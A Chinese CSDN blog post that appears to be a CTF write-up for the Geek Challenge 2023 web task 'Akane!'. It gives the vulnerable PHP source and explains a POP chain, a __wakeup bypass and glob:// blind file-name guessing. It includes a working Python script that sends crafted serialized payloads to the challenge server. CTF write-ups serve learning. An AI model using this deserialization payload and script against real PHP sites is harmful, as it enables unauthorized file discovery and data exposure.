极客大挑战Geek Challenge-2023 Web_Akane!

已于 2023-12-07 20:51:38 修改
阅读量135 收藏
点赞数
分类专栏: CTF 文章标签: 前端 java android
于 2023-11-21 08:31:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shao65308/article/details/134522898
版权

题目源码:

<?php
error_reporting(0);
show_source(__FILE__);
class Hoshino
{
    public $Ruby;
    private $Aquamarine;

    public function __destruct()
    {
        $this->Ruby->func();
    }
}

class Idol
{
    public $Akane;

    public function __wakeup()
    {
        $this->Akane = '/var/www/html/The************************.php';
    }

    public function __call($method,$args)
    {
        $Kana = count(scandir($this->Akane));
        if ($Kana > 0) {
            die('Kurokawa Akane');
        } else {
            die('Arima Kana');
        }
    }
}

$a = unserialize(base64_decode($_GET['tuizi']));

?>

POP链很简单:Hoshino::__destruct(调用Idol类中不存在的方法)=>Idol::__call

思路就是可以通过glob://协议利用匹配符号进行猜解, glob协议能够查找匹配的文件路径模式,当目标匹配不存在时会返回⻓度为0的数组,因此在这个地方能够通过不同的回显进行盲注,利用脚本和通配符逐个猜解,若正常页面会显示“Kurokawa Akane”,接着爆下一个,直到找到正确文件名
其中通过修改属性绕过 __wakeup

import requests,base64
url = 'http://hcek0fp8wd5f5tudntpuhce7n.node.game.sycsec.com/' 
flag = ''
for _ in range(1,40):
    for i in range(32,128):
        if i in [37,42,62,63]:
            continue
        ser = r'O:7:"Hoshino":3:{s:4:"Ruby";O:4:"Idol":1:{s:5:"Akane";s:'+str(29+_)+':"glob:///var/www/html/The'+flag+chr(i)+'*.php";}s:19:"HoshinoAquamarine";N;}'
        ser=ser.encode('utf-8')
        param=base64.b64encode(ser)
        param=r'?tuizi='+param.decode()
        #print(url+param)
        res = requests.get(url+param)
        #print(res.text)
        if 'code>Kurokawa' in res.text:
            flag += chr(i)
            print(flag)
            break
flag_url=url+'The'+flag.replace(" ","")+'.php'
print(flag_url)
print(requests.get(flag_url).text)

参考文章:

https://blog.csdn.net/m0_46436640/article/details/119413552
https://www.jianshu.com/p/16c56bebc63d

shao65308
关注
专栏目录
极客挑战2023 Reverse wp
Sciurdae的博客
12-05 1660
上面就是check检查flag是否是table里的内容,再得到flag在table的索引,根据索引在number中找出对应值。作了一个点击后的处理方法,如果字符串长度超过24就清空,为0或者不足24就自动往后面补充"X",。全都是简单的jnz和jz互补跳转,将E8或者E9全部改为90就好,下面的有些数据转换成代码也是一样的操作。将sb,按照奇偶位分成了sb2和sb3。因为先前加密的时候用的是第一个和最后一个加密,所以解密的flag自己再手动调整下。魔改的TEA,第一次加密的v1,继续作为第二组的v0加密。
【多线程栈溢出】极客挑战2023 ez_fullprotection
qq_61670993的博客
11-22 445
题目不错, 学的了很多
第八届极客挑战 Web-iPhone X
weixin_30496751的博客
10-31 70
题目: 解题思路: 第一次看到html里只有字其他啥也没有的题,一脸懵逼,学长提示抓包改包,于是开始我的苦逼解题。 0x01 抓包 0x02 改包 由于题目说只有iphoneX才能接受这个website,所以联想到要将user-agent改为iPhone的版本。 如图,好不容易找到iphone的user-agent,它却说ip不对,请教了帅行学长,改...
极客挑战2023 Web方向题解wp 全
Jay17的博客
11-28 5484
极客挑战2023 Web方向题解wp 全
2021 极客挑战 web
Blazing-Angel的博客
02-09 1018
前言 拖了老长时间没写wp了,这题写的真爽 Dark 给了一个url: http://c6h35nlkeoew5vzcpsacsidbip2ezotsnj6sywn7znkdtrbsqkexa7yd.onion/ 搜了一下后缀 onion 下一个洋葱浏览器 访问地址即可 Welcome2021 查看源码: <!-- 请使用WELCOME请求方法来请求此网页 --> 一直不理解什么是welcome请求方法 其实就是换个请求方法 Babysql Sqlmap跑一下 Babypop <?p
the-geek-in-the-corner-master_rdma_源码
10-02
RDMA(Remote Direct Memory Access)是一种高效的数据传输技术,它允许网络上的两个设备直接读写对方内存,而无需经过操作系统内核,从而极大地提高了数据传输速度并降低了CPU利用率。这个压缩包文件“the-geek-in-...
CSDN极客「CSDN Geek」-crx插件
03-20
本扩展可以帮你将要分享的消息快速分享到极客头条,支持自动获取内容链接、标题(支持修改),支持填写“推荐理由”并选择要分享的子社区板块。 本扩展开发者为@zhangjie,源代码地址:...
社交极客「Social Geek」-crx插件
03-19
“社交极客”是一个用于引用多个站点上的用户/公司的Chrome扩展。 您只需在任何网页上突出显示用户/公司,然后点击“社交极客”。截至目前,你可以参考Github,LinkedIn,堆栈溢出,Meetup,Quora和Apache Jira。 ...
ImA_Geek:填补空白:我是___________ Geek
02-13
【标题】:“ImA_Geek:填补空白:我是___________ Geek!” 在这个项目中,"ImA_Geek" 是一个互动活动,旨在让用户自我表达他们的兴趣领域,通过填空来宣称自己是某一特定领域的“Geek”。这里的“Geek”不再带有...
基于javatcpsocket通信的拆包和装包源码-coding-guide_i3geek-master:编码指南_i3geek-master
06-06
基于java tcp socket通信的拆包和装包源码 程序设计经验总结 一名JAVA程序员,将自己的编程学习之路做以总结并进行分享。内容包括但不限于数据结构、算法、数据库、操作系统、计算机网络等多方面。...
极客挑战2023 misc 部分wp
m0_72135419的博客
11-28 1109
公众号发送flag获取图片后查看lsb隐写。
BUUCTF WEB 极客挑战 2019 Http
Ethan552525的博客
08-04 840
题目: 解题: 1:查看网页源代码 浏览页面,没有发现有用信息,查看源代码发现:Secret.php 2:尝试访问/Secret.php HTTP Referer Http Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的,服务器借此可以获得一些信息用于处理。比如从我主页上链接到一个朋友那里,他的服务器就能够从HTTP Referer中统计出每天有多少用户点击我...
[极客挑战 2019]Http
xlcvv的博客
04-05 564
F12审查元素,有一个Secret.php文件: 进去瞅一眼: 翻译: 你不是从https://www.Sycsecret.com来 就是构造header: 得到flag(老是忘了google的hackbar有这个add header功能,害的我老是去burp里面做) ...
[极客挑战 2019]Http_WP
qq_34624735的博客
08-12 289
打开源代码 打开WriteUp 原来我眼瞎 先补一下HTTP中的请求头和响应头属性 X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,(通常一些网站的防注入功能会记录请求端真实IP地址并写入数据库or某文件[通过修改XXF头可以实现伪造IP]). 进Secret.php后 用Burp抓包重放,请求头加Referer 响应: 那就改UA呗 响应: 那就加XXF头 响应: ...
【misc】2021 极客挑战(部分)
woodwhale的博客
11-29 4415
【misc】2021 极客挑战(部分) 1、今天有被破防吗? 0x1 最早上的一批题目,当时没什么思路。后来pwn神在群里提到了RGB,瞬间懂了! 参考链接: gaps拼图 0x2 下载附件得到一个很长的txt文本,其中每一行都是三个数字。如果知道是RGB就好处理了。 0x3 注意到一共1166400行,那么就是1080*1080的规格 简单的python脚本处理一下图片 from PIL import Image res = [] with open("./ans.txt","r") as f
【python】OCR
bryant_meng
12-16 3176
先看看百度百科对 OCR 的定义: OCR (Optical Character Recognition,光学字符识别)是指电子设备(例如扫描仪或数码相机)检查纸上打印的字符,通过检测暗、亮的模式确定其形状,然后用字符识别方法将形状翻译成计算机文字的过程;即,针对印刷体字符,采用光学的方式将纸质文档中的文字转换成为黑白点阵的图像文件,并通过识别软件将图像中的文字转换成文本格式,供文字处理软件进一步编辑加工的技术。如何除错或利用辅助信息提高识别正确率,是OCR最重要的课题,ICR(Intelligent C.
2020第十一届极客挑战——Geek Challenge部分wp
monster663的博客
10-26 4066
比赛正在进行中,本来只剩web没有AK,然后出了一波新题,先留一个坑,之后再填
2018极客挑战-not reverse
博客
11-30 499
欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 学好数学很重要 学好数学很重要 学好数学很重要 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: ...
web扩展
最新发布
x737510的博客
10-10 625
HTTP(Hypertext Transfer Protocol)协议中的它们在用途和使用方式上有一些区别。用于请求服务器上的资源,通常是获取数据。GET 请求是幂等的,多次请求返回的结果应该是相同的,而且不应该对服务器产生任何副作用。用于向服务器提交数据,通常是提交表单数据或上传文件等。POST 请求可能对服务器产生副作用,例如在数据库中创建新的资源。数据通过 URL 参数传递,附在 URL 后面。因为数据在 URL 中可见,所以不适合传递敏感信息,且有长度限制。
Artist_Engineering_Geek工具包-压缩版发布
资源摘要信息:"Artist_Engineering_Geek-0.0.5-py3-none-any.whl.zip" 知识点: 1. 文件格式解释: - "whl":这是Python的wheel文件格式,用于Python模块和扩展包的分发。它被设计为一种更快、更简单的安装包分发...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值